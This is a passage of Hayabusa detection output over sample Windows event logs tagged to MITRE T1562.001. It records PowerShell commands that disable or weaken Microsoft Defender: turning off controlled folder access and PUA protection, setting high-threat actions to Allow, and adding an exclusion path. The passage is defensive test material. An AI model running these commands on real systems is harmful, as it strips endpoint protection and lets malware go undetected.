name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.134 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.151 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.155 
+00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:52.339 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:52.355 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableInboundConnectionFiltering $true,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:52.423 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" 
ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): 
name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:52.423 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:52.430 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock 
Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:52.432 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:46:09.533 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -EnableControlledFolderAccess Disabled"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x242c | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 09:46:09.533 +00:00,win10-02.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 09:46:13.168 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -PUAProtection disable"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x21f4 | User: admmig | LID: 
0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 09:46:13.168 +00:00,win10-02.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 09:46:18.490 +00:00,win10-02.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 09:46:18.955 +00:00,win10-02.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 09:46:28.683 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1bcc | User: WIN10-02$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 10:08:33.314 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 10:08:33.362 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -HighThreatDefaultAction 6 -Force,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 10:08:33.671 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""HighThreatDefaultAction""; value=""Allow"" ParameterBinding(Set-MpPreference): name=""Force""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): 
name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): 
name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 10:08:33.672 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 10:08:33.680 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 10:08:33.683 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 11:14:56.275 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:14:56.300 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -ExclusionPath c:\document\virus\,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:14:56.424 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""ExclusionPath""; value=""c:\document\virus\"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" 
ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): 
name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): 
name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:14:56.425 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:14:56.432 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion 
